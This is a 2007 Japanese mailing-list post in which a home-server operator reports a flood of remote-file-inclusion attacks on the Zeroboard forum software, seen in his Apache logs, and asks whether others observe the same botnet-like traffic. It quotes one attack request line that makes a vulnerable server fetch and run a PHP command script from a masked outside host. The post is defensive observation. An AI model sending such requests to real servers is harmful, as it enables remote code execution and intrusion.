[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[connect24h:11802] ゼロボードのアタックが来ていませんか?
- To: connect24h@xxxxxxxxxx
- Subject: [connect24h:11802] ゼロボードのアタックが来ていませんか?
- From: 石川 聖昭 <iki_yakkha@xxxxxxxxxxx>
- Date: Tue, 6 Nov 2007 00:10:26 +0900 (JST)
石川@倭邦人工房です。
今年の9月の末から以下のアタックが、自宅サーバーの Apache の access_log
に記録されています。
GET //skin/zero_vote/error.php?dir=http://XXXXX/cmd.txt? HTTP/1.1
これ、Web検索で調べると韓国産の「ゼロボード」と言う掲示板ソフトのセキュ
リティホールを付いたアタックだそうです。2005年に流行ったようです。
わたしのログでも過去に散発的に記録しています。わたしはこのソフトを使用
していませんので、それだけなら問題はないのですが。
ところが、最近異常に多いので、皆さんの方でも観測されているのかお尋ねし
ます。
10月11日以降は、ほぼ毎日10箇ほどのIPからのアタックがあります。
集計して調べたら、全アタック数は 1500 ほどで IP数は 300 ぐらいはあると
思います。IPは毎日違います。同じIPが3日以上来ることはないです。
IPアドレスを nslookup で調べたら、世界各地のドメインになります。
パラメータに使用している cmd.txt を調べるとPHP言語で、システム情報を取
得したり、コマンドを実行させようとしているようです。
cmd.txt のところは safe.txt や id.txt などいろいろのファイル名で、内容
は少しづつ違いがあります。
パラメータの「http://」以下のドメインも世界各地のサーバーを使用している
ようです。
これは「ボット・ネット」ですかね?
アタックして来る IP もパラメータのドメイン先も「ロボット」かと思うので
すが、いかがでしょうか。
今は、このアタック用のログを別ファイルに保存して、観測しているのです
が、皆さんの方でも観測されていたら、お知らせください。
#まさか、局地限定販売てことはないと思うけど・・
以上、宜しくお願いします。
石川 聖昭
URL : http://www.wahoujin.net/
倭邦人工房
【MLコミュホームページ】http://www.freeml.com/connect24h
--[PR]------------------------------------------------------------------
カ|ツ|ラ|?|増|毛|?|植|毛|?|いいえ【リーブ21】は違います。
─┘─┘─┘─┘─┘─┘─┘─┘─┘─┘………………………………………
リーブ21は発毛専門です。『発毛』とは自分の髪が生えてくるということ。
あなたの健康をトータルのサポートすることで『発毛』を促進します。
http://ad.freeml.com/cgi-bin/sa.cgi?id=aAL7X
------------------------------------------------------------------[PR]--
■GMO INTERNET GROUP■ GMO INTERNET www.gmo.jp